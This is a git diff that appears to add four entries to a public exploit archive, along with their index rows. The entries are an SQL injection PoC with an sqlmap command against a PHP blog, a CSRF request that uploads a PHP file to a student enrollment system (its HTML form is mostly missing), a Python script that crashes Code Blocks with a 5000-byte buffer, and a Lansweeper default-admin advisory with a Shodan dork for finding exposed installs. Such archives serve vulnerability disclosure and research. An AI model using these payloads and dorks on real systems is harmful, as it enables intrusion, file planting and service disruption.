diff --git a/exploits/php/webapps/48615.txt b/exploits/php/webapps/48615.txt new file mode 100644 index 000000000..2bd931a68 --- /dev/null +++ b/exploits/php/webapps/48615.txt @@ -0,0 +1,21 @@ +# Exploit Title: Responsive Online Blog 1.0 - 'id' SQL Injection +# Date: 2020-06-23 +# Exploit Author: Eren Şimşek +# Vendor Homepage: https://www.sourcecodester.com/php/14194/responsive-online-blog-website-using-phpmysql.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14194&title=Responsive+Online+Blog+Website+using+PHP%2FMySQL +# Version: v1.0 +# Tested on: Linux - Wamp Server + +>Vulnerable File + /category.php + +>Vulnerable Code + + $id=$_REQUEST['id']; + $query="SELECT * from blog_categories where id='".$id."'"; + Id parameter enters sql query without any changes + +>Proof Of Concept + sqlmap 'http://localhost/resblog/category.php?id=1' --dbs --batch + OR + http://TARGET/resblog/category.php?id=1' Single Quote will cause SQL error \ No newline at end of file diff --git a/exploits/php/webapps/48616.txt b/exploits/php/webapps/48616.txt new file mode 100644 index 000000000..15db21344 --- /dev/null +++ b/exploits/php/webapps/48616.txt @@ -0,0 +1,89 @@ +# Exploit Title: Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student) +# Google Dork: N/A +# Date: 2020-06-20 +# Exploit Author: BKpatron +# Vendor Homepage: https://www.campcodes.com/projects/php/4745/online-student-enrollment-system-in-php-mysqli/ +# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/student_enrollment_1.zip +# Version: v1.0 +# Tested on: Win 10 +# CVE: N/A +# my website: bkpatron.com + +# Vulnerability: + +This product is unprotected against CSRF vulnerabilities. +The application interface allows users to perform certain actions +via HTTP requests without performing any validity checks to verify the +requests. +you can upload a PHP file here with CSRF. + +# CSRF PoC( add student ,File Upload): + + + +
+ +
+ +
+ +
+ +
+ +
+ +
+ +
+ + + +#HTTP Request: + +http://localhost/student_enrollment/admin/index.php?page=add-student + +POST /student_enrollment/admin/index.php?page=add-student HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------1586330740172 +Content-Length: 1669 +Referer: http://localhost/exploit2.php +Cookie: _ga=GA1.1.1667382299.1577635358; PHPSESSID=2dhsgkdiavgfefp6g0qp63ruqe +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +-----------------------------1586330740172: undefined +Content-Disposition: form-data; name="name" +bkpatron +-----------------------------1586330740172 +Content-Disposition: form-data; name="roll" + +333000 +-----------------------------1586330740172 +Content-Disposition: form-data; name="address" + +0000 +-----------------------------1586330740172 +Content-Disposition: form-data; name="pcontact" + +01911111111 +-----------------------------1586330740172 +Content-Disposition: form-data; name="class" + +1st +-----------------------------1586330740172 +Content-Disposition: form-data; name="photo"; filename="up.php" +Content-Type: application/octet-stream +... + +// uploaded file path: http://localhost/student_enrollment/admin/images/your_file.php \ No newline at end of file diff --git a/exploits/windows/dos/48617.py b/exploits/windows/dos/48617.py new file mode 100755 index 000000000..4625c4202 --- /dev/null +++ b/exploits/windows/dos/48617.py @@ -0,0 +1,34 @@ +# Exploit Title: Code Blocks 20.03 - Denial Of Service (PoC) +# Vendor Homepage: http://www.codeblocks.org/ +# Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/20.03/Windows/codeblocks-20.03-setup.exe/download +# Exploit Author: Paras Bhatia +# Discovery Date: 2020-06-23 +# Vulnerable Software: Code Blocks +# Version: 20.03 +# Vulnerability Type: Denial of Service (DoS) +# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) + +#Steps to Produce the Crash: + +# 1.- Run python code: CodeBlocksCrash.py +# 2.- Copy content to clipboard +# 3.- Open "codeblocks.exe" +# 4.- In the "Management" section on left hand side, Click on "FSymbols" tab. +# 5.- Select "Active project's symbols" from drop down "View:" menu. +# 6.- Paste ClipBoard into the "Search:" field. +# 7.- Press Enter from keyboard. +# 8.- Crashed. + + +################################################################################################################################################## + + +#Python "CodeBlocksCrash.py" Code: + +f= open("CodeBlocksCrash.txt", "w") + +payload="\x41" * 5000 + +f.write(payload) + +f.close() \ No newline at end of file diff --git a/exploits/windows/local/48618.txt b/exploits/windows/local/48618.txt new file mode 100644 index 000000000..e4f645f9f --- /dev/null +++ b/exploits/windows/local/48618.txt @@ -0,0 +1,54 @@ +# Exploit Title: Lansweeper 7.2 - Incorrect Access Control +# SHODAN DORK : title:"Lansweeper - Login" +# Date: 2020-06-14 +# Exploit Author: Amel BOUZIANE-LEBLOND +# Vendor Homepage: https://www.lansweeper.com/ +# Software Link: https://www.lansweeper.com +# Version: 6.0.x through 7.2.x +# Tested on: Windows +# CVE : CVE-2020-14011 + +### Title: +Incorrect Access Control. + +### Category: +Exploit + +### Severity: +Critical + +### Description: +Lansweeper 6.0.x through 7.2.x has a default installation in which the +admin password is configured for the admin account, unless "Built-in +admin" is manually unchecked. This allows command execution via the +Add New Package and Scheduled Deployments features. + +### Other observation: +Hi, This issue is kind of critical, +By using shodan with this filter title:"Lansweeper - Login" +We will find some Lansweeper with default installation on it + + +### Details: +The Lansweeper application is agentless network inventory software that can be used for IT asset management. +It uses the ASP.NET technology on its web application. + +### Analysis: +When you install Lansweeper 6.0 or a more recent Lansweeper release and access the web console for the first time, +you are presented with a First Run Wizard, +which allows you to set up scanning and configure some basic options. +Any subsequent times you access the console, +you are presented with a login screen. +By default, everyone in your network can access all of Lansweeper's features and menus simply by browsing to the web console URL and hitting the Built-in Admin button. + +### Suggested mitigation: +restrict access to the console and configure what users can see or do once they've been granted access. +You assign a built-in or custom user role, a set of permissions, to user groups or individual user accounts. +A user's role determines what the user can see or do within the console.. + +### Impact/Risk: +Remote code execution +can expose the organization to unauthorized access of data and programs, fraud. + +-- +Amel BOUZIANE-LEBLOND \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ba82b8ad1..3311e42a9 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6751,6 +6751,7 @@ id,file,description,date,author,type,platform,port 38079,exploits/windows/dos/38079.py,"Savant Web Server 3.1 - Denial of-Service (PoC)",2012-01-22,DDD004,dos,windows, 43197,exploits/windows/dos/43197.py,"ALLPlayer 7.5 - Denial of-Service (PoC)",2017-11-27,"Kiefer Bauer",dos,windows, 48613,"exploits/windows/dos/48613.Frigate 2.","Frigate 2.02 - Denial Of Service (PoC)",2020-06-22,"Paras Bhatia",dos,windows, +48617,exploits/windows/dos/48617.py,"Code Blocks 20.03 - Denial Of Service (PoC)",2020-06-23,"Paras Bhatia",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -11112,6 +11113,7 @@ id,file,description,date,author,type,platform,port 48579,exploits/windows/local/48579.py,"Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC)",2020-06-11,"Paras Bhatia",local,windows, 48591,exploits/windows/local/48591.txt,"Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path",2020-06-16,boku,local,windows, 48594,exploits/windows/local/48594.py,"Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)",2020-06-17,"Paras Bhatia",local,windows, +48618,exploits/windows/local/48618.txt,"Lansweeper 7.2 - Incorrect Access Control",2020-06-23,"Amel BOUZIANE-LEBLOND",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42871,3 +42873,5 @@ id,file,description,date,author,type,platform,port 48610,exploits/php/webapps/48610.txt,"Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload",2020-06-22,BKpatron,webapps,php, 48611,exploits/multiple/webapps/48611.txt,"WebPort 1.19.1 - Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,multiple, 48612,exploits/php/webapps/48612.txt,"WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,php, +48615,exploits/php/webapps/48615.txt,"Responsive Online Blog 1.0 - 'id' SQL Injection",2020-06-23,"Eren Şimşek",webapps,php, +48616,exploits/php/webapps/48616.txt,"Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)",2020-06-23,BKpatron,webapps,php,